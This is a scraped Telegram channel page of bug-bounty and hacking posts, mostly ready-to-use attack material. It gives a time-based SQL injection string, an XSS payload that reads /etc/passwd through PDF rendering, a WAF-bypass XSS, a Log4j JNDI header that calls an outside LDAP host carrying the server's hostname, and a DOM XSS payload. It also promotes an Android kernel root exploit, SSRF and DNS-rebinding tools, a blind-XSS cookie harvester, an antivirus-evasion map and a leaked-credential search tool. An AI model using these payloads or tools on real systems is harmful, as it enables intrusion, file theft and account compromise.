BugCod3 – Telegram
BugCod3
6.23K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
Download Telegram
LFI Vulnerability Testing: Key Parameters

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#BugBounty #infosec

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
21🔥1
For 0Day SQLI in

(app extension)

payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
21👍1🔥1
XSS to Exfiltrate Data from PDFs

<noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</noscript><noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</noscript>

How to use:
Server Side XSS (Dynamic PDF)

#XSS #PDF

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥321
┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *1402

┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 1403


#Notification #NewYear

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
51🔥1
If you are testing API, before fuzzing observe these:

1. Does it throw same data for /v1/user and /v1/user

2. Is it case sensitive?

/v1/user => 200 OK

/v1/USER => 200 OK

OR

/v1/user => 200 OK

/v1/User => 404

How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
👍311🔥1
Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
11🔥1
Log4j 🙌 Application was running java

Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}

#BugBounty #Tips #Security

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
11🔥1
Easy P1 🔥
Add to your wordlist

/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2


#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
11🔥1
Mali GPU Kernel LPE

Android 14 kernel exploit for Pixel7/8 Pro

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:

Pixel 8 Pro: google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
Pixel 7: google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys

Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.

Github

⬇️ Download
🔓 BugCod3

#C #Exploit #Android #Kernel #Pixel

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
11👍1🔥1
java2S3 Amazon S3 Bucket Enumeration Tool

Introduction:
This Python noscript automates the enumaration of S3 Buckets referenced in a subdomain's javanoscript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.

Features:
⚪️ Fetches HTTP status codes for subdomains
⚪️ Retrieves JavaScript URLs associated with each subdomain
⚪️ Identifies Amazon S3 buckets in the content

Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests


Usage:
Create a text file (input.txt) containing a list of subdomains (one per line).

python js2s3.py input.txt example.com output.txt


Github

⬇️ Download
🔓 BugCod3

#Python #Amazon #S3 #Buckets

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
21🔥1
SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.

By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.

SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.

Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic

Installation:
gem install ssrf_proxy


Usage (command line):
ssrf-proxy [options] -u <SSRF URL>

ssrf-proxy -u http://target/?url=xxURLxx


Github

⬇️ Download
🔓 BugCod3

#Ruby #Proxy #SSRF

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
21🔥1
httprebind

Automatic tool for DNS rebinding-based SSRF attacks

Installation:
sudo pip install dnslib flask flask_cors


Usage:
sudo python httprebind.py domain.name serverIp mode


Where mode is one of: ec2, ecs, gcloud

Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.

Github

⬇️ Download
🔓 BugCod3

#Python #DNS #SSRF #Attack

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
11🔥1
hackerone-reports

Top disclosed reports from HackerOne

Tops of HackerOne reports. All reports' raw info stored in data.csv. Scripts to update this file are written in Python 3 and require chromedriver and Chromium executables at PATH. Every noscript contains some info about how it works. The run order of noscripts:


1. fetcher.py
2. uniquer.py
3. filler.py
4. rater.py

Github

⬇️ Download
🔓 BugCod3

#BugBounty #Reports #HackeOne

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
31🔥1
DOM-XSS-SiteMinder

Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

📞 Nuclei Template

#XSS #DOM

👤 T.me/BugCod3BOT
T.me/BugCod3Topic
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥321🤣1
Form Finder

This noscript can be used to find HTML forms in the list of endpoints/URLs.

Usage:
python3 formfinder.py endpoints.txt


😸 Github

⬇️ Donwload
🔒 BugCod3

#Python #Form #Finder

👤 T.me/BugCod3BOT
T.me/BugCod3Topic
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥321👍1
Algolia AppId+API-KEY PoC to show permissions:

curl "https://[APP-ID]-dsn.algolia.net/1/keys/[APPKEY]?x-algolia-application-id=[APP-ID]&x-algolia-api-key=[ApiKey]"

If ACL is Search only, it's likely to be a P5, if it has other sensitive permissions.. it's a P1/P2

#BugBounty #Tips

👤 T.me/BugCod3BOT
T.me/BugCod3Topic
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
22🔥2🤣1
Smaug - The OSINT for database's

Search inside every file, folder and subfolder for OSINT
(based on the book The Hobbit, Smaug the dragon)

💬
It is not an online tool. This program scans your local database to search a variable you specified inside each file with bruteforce.
This tool has been created for utility to search inside every file which contains your input,
and also not all files/folders are supported (outside UTF-8 unicode) atm.
Could be useful for osint individuals.

🔼 Compile:
🖥 Unix:
⚪️ run make inside smaug-main

🖥 Windows:
⚪️ linux enviroment, example WSL or Chocolatey, run make inside smaug-main.

⚪️ otherwise, if you are running inside an IDE, just compile the program specifying the Makefile under smaug-main.

💻 Usage:
⚪️ Place it (smaug.exe) under the root directory containing all files and subfolders.
⚪️ Run cmd.exe inside that folder
⚪️ Run: smaug.exe text_variable
⚪️ Now you wait till it finishes searching.

😸 Github

⬇️ Download
🔒 BugCod3

#C #Smaug #OSINT

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
32🔥2
🦈 Wireshark 🦈

(4.2.4) has been released. Enjoy.

#Wireshark #Released

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
32🔥2
BypassAV

This map lists the essential techniques to bypass anti-virus and EDR

💬
as a reminder: it is highly recommended to read the articles related to manual techniques rather than using open source tools which are more likely to be suspected by the anti-virus because of IOSs

😸 Github

⬇️ Download
🔒 BugCod3

#Pentest #AV #Bypass

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
32🔥2👍1
🕷 ezXSS 🕷

ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.

💬
ezXSS is a tool that is designed to help find and exploit cross-site noscripting (XSS) vulnerabilities. One of the key features of ezXSS is its ability to identify and exploit blind XSS vulnerabilities, which can be difficult to find using traditional methods.

📊 Features:
⚪️ Easy to use dashboard with settings, statistics, payloads, view/share/search reports
⚪️ 🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
⚪️ Manage unlimited users with permissions to personal payloads & their reports
⚪️ Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
⚪️ Custom extra javanoscript payloads
⚪️ Custom payload links to distinguish insert points
⚪️ Extract additional pages, block, whitelist and other filters
⚪️ Secure your login with Two-factor (2FA)
⚪️ The following information can be collected on a vulnerable page:
⚫️ The URL of the page
⚫️ IP Address
⚫️ Any page referer (or share referer)
⚫️ The User-Agent
⚫️ All Non-HTTP-Only Cookies
⚫️ All Locale Storage
⚫️ All Session Storage
⚫️ Full HTML DOM source of the page
⚫️ Page origin
⚫️ Time of execution
⚫️ Payload URL
⚫️ Screenshot of the page
⚫️ Extract additional defined pages
⚪️ Triggers in all browsers, starting from Chrome 3+, IE 8+, Firefox 4+, Opera 10.5+, Safari 4+
⚪️ much much more, and, its just ez :-)

Required:
⚪️ Server or shared web hosting with PHP 7.1 or up
⚪️ Domain name (consider a short one or check out shortboost)
⚪️ SSL Certificate to test on https websites (consider Cloudflare or Let's Encrypt for a free SSL)

Installation:
⚪️ ezXSS is ez to install with Apache, NGINX or Docker
⚪️ visit the wiki for installation instructions.

😸 Github

⬇️ Download
🔒 BugCod3

#PHP #XSS #Blind #Pentest

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥522👍1
This media is not supported in your browser
VIEW IN TELEGRAM
🔍 Chiasmodon 🔍

💬
Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. the tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.

📊 Features:
🌐 Domain: Conduct targeted searches by specifying a domain name to gather relevant information related to the domain.
🎮 Google Play Application: Search for information related to a specific application on the Google Play Store by providing the application ID.
🔎 CIDR and 🔢🔢ASN: Explore CIDR blocks and Autonomous System Numbers (ASNs) associated with the target domain to gain insights into network infrastructure and potential vulnerabilities.
✉️ Email, 👤Username, 🔒 Password: Conduct searches based on email, username, or password to identify potential security risks or compromised credentials.
🌍 Country: Sort and filter search results by country to gain insights into the geographic distribution of the identified information.
📋 Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
⚙️ Additional Options: The tool offers various additional options, such as viewing different result types (credentials, URLs, subdomains, emails, passwords, usernames, or applications), setting API tokens, specifying timeouts, limiting results, and more.

🔼 Install:
pip install chiasmodon


💻 Usage:
chiasmodon_cli.py -h


😸 Github

⬇️ Download
🔒 BugCod3

#OSINT #BugBounty #Tools

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥3👍21